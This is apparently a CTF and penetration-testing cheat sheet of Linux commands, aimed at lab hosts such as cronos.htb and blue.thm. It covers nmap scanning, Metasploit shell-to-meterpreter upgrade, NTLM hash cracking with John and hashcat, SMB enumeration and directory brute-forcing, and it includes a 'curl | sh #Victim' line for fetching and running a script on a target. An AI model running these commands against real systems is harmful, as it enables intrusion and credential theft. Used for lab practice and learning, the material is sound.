Linux commands that are often used by hackers, security professionals and CTF players. We will avoid any payloads or one-liner exploits (these will be covered on a different page sometime). Updated - October 02, 2023.

Add Target to hosts file

└─$ echo ' blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav: blue.thm


#for TCP Scan
sudo nmap -sC -sV -p- -T5 -Pn targethost

#for UDP Scan
sudo nmap -sU -sV -p- -T5 -Pn targethost

# Store scan results for ports separated by comma.
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')

# Check which ports are found
└─$ echo $ports

# Pass the information in -p argument as $ports
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb
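
The grep/cut/tr/sed pipeline above keeps every line that starts with a digit, so ports reported as filtered or closed also end up in $ports. The following is an added example, not part of the original page: open_ports is a hypothetical helper that keeps only ports whose state is exactly "open", page_pipeline reproduces the page's pipeline for comparison, and the scan output in sample_scan is constructed.

```shell
#!/bin/sh
# Added example (not from the original page).
# open_ports: read nmap "normal" output on stdin and print the ports whose
# state is exactly "open", comma-separated, ready for use with -p.
open_ports() {
    awk '
        # Port table rows look like: 22/tcp   open  ssh
        $1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
            split($1, f, "/")
            if (!(f[1] in seen)) {      # de-duplicate across several hosts
                seen[f[1]] = 1
                out = out (out == "" ? "" : ",") f[1]
            }
        }
        END { if (out != "") print out }
    '
}

# The pipeline from the page, wrapped in a function for comparison.
page_pipeline() {
    grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'
}

# Constructed nmap output (documentation address), for demonstration only.
sample_scan() {
    cat <<'EOF'
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-02 10:00 UTC
Nmap scan report for cronos.htb (192.0.2.10)
Host is up (0.050s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
53/tcp   open     domain
80/tcp   open     http
8080/tcp filtered http-proxy

Nmap done: 1 IP address (1 host up) scanned in 42.10 seconds
EOF
}

echo "open only:     $(sample_scan | open_ports)"
echo "page pipeline: $(sample_scan | page_pipeline)"
```

With a real scan, pipe nmap's output into open_ports instead of sample_scan; UDP results in state open|filtered are left out because the state must match "open" exactly.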


Start Metasploit with database

└─$ systemctl start postgresql

└─$ msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

Metasploit Shell Upgrade to Meterpreter

sessions -u 3
sessions -u -1
use post/multi/manage/shell_to_meterpreter
run session=-1

Cracking hash with John

└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt 

Cracking hash with hashcat

Windows NTLM Hash

hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz

Extract Files

Gz Files

gunzip archive.gz

tar Files

tar -xvzf archive.tar.gz

SSH Connection

ssh username@host -oHostKeyAlgorithms=+ssh-dss

Text Filter

grep -i pattern   # include matching lines (case-insensitive)
grep -v pattern   # exclude matching lines

SMB Enumeration


nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_HOST
smbclient //IP/directory

Mount NFS Share

Make a directory locally and mount the share on it

mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR


Get version via banner

nc IP port


From github

curl -L | sh

Python Simple HTTP Server

python3 -m http.server 7777
curl | sh #Victim

WordPress CMS Vulnerability Scanning

wpscan --url https://brainfuck.htb --disable-tls-checks

Directory Enumeration

└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400

└─$ gobuster dir -u http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet

Reading a File

head -20 filepathandname
tail filename
tail -20 filename
cat filename | grep "word_to_filter"

Replace in File

sed 's/wordtoreplace/wordtoreplacewith/g' /filepath > outputfilepath